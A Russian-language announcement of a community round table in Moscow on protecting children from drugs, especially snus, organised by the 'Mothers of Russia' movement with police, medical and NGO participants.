Круглый стол «Матери Москвы против наркотиков»


Настоящий материал (информация) произведен, распространен и (или) направлен иностранным агентом Благотворительным фондом развития филантропии, либо касается деятельности иностранного агента Благотворительного фонда развития филантропии

15 февраля на базе «Моего социального центра» в Марьиной Роще и при поддержке Коворкинг-центра НКО Московское региональное отделение Всероссийского общественного движения «Матери России» проводит Круглый стол для всех неравнодушных жителей на тему: «Матери Москвы против наркотиков».

Как часто вы слышите о нюхательных смесях, так называемых снюсах? Каждый день по телевизору рассказывают об очередном рейде Роспотребнадзора; к решению проблемы подключились законодательные органы и активные граждане. Но правда в том, что результат еще только впереди и будущее наших детей под угрозой! Как защитить вашего ребенка? Поговорим об этом в рамках круглого стола.

В обсуждении примут участие представители ГУ МВД, Ассоциации женщин московской полиции, комиссии по делам несовершеннолетних, специалисты по лечению наркозависимости, психологи, представители различных некоммерческих организаций. Мероприятие организовано общественным движением «Матери России» и главой муниципального округа Марьина Роща Екатериной Игнатовой.

Также на мероприятии представители Московского отделения ВОД «Матери России» расскажут о своем реальном опыте в оказании психологической, юридической и информационной помощи мамам, а каждая мама в сложной жизненной ситуации сможет получить консультацию клинического психолога и врача-нарколога.

 

Приходите, в вопросах безопасности наших детей мы должны быть едины!

 

#ДушевнаяМосква #ДушевноеСобытие #КЦ_СВАО #анонс_НКО #НКО #НКОМосквы #НКОСВАО #НКО #СВАО #добрые_соседи_нко_свао #МарьинаРоща #НетНаркотикам #МатериРоссии #МРОВОДМатериРоссии

 

Дата и время: 15 февраля; 12:00-15.00

Адрес: «Мой социальный центр», Сущевский Вал 31 с. 2

Ответственное лицо, справки: Дикая Валентина Николаевна — 8(916)517-02-74

//cdn-vk.com/js/vk.js?v=2